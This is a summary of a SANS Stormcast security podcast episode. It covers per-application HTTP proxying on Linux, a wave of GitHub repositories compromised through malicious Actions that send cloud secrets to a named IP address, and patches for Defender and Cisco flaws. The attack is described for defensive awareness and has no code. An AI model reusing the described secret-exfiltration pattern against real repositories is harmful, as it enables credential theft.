SANS Stormcast Friday, May 22nd, 2026: Selective HTTP Proxying; More GitHub Repo Trouble; MSFT Defender Patches;

The episode opens with a deep dive into selective HTTP proxying. While Proxifier remains a macOS and Windows‑only solution, the host outlines three Linux workarounds: setting HTTP_PROXY/HTTPS_PROXY environment variables, leveraging iptables for user‑specific redirection, and employing network namespaces to isolate an application’s network stack. These techniques let analysts capture traffic from a single program without drowning in system‑wide noise, a practical tip for reverse engineers and red‑team operators.

The conversation then shifts to a fresh wave of GitHub repository compromises. Attackers harvest previously leaked credentials to inject malicious GitHub Actions that trigger on pushes, pulls, or external calls. Once active, the actions silently siphon AWS, Google, and other cloud secrets—API keys, JWTs, private SSH keys—sending them to IP 216.126.225.129. This supply‑chain style breach underscores the need for strict secret management, action provenance checks, and continuous monitoring of repository activity.

Finally, the host reviews two critical vendor updates. Microsoft Defender’s latest patch addresses the Red Sun and Undefend privilege‑escalation exploits, automatically rolling out via its regular update cadence. Meanwhile, Cisco disclosed a CVSS 10 authentication bypass in the Secure Workload REST API, granting unauthenticated users full admin rights. Organizations running the workload must apply the emergency fix and isolate the API from public networks. Together, these alerts illustrate how rapid patching, layered network controls, and vigilant credential hygiene remain essential pillars of modern cybersecurity strategy.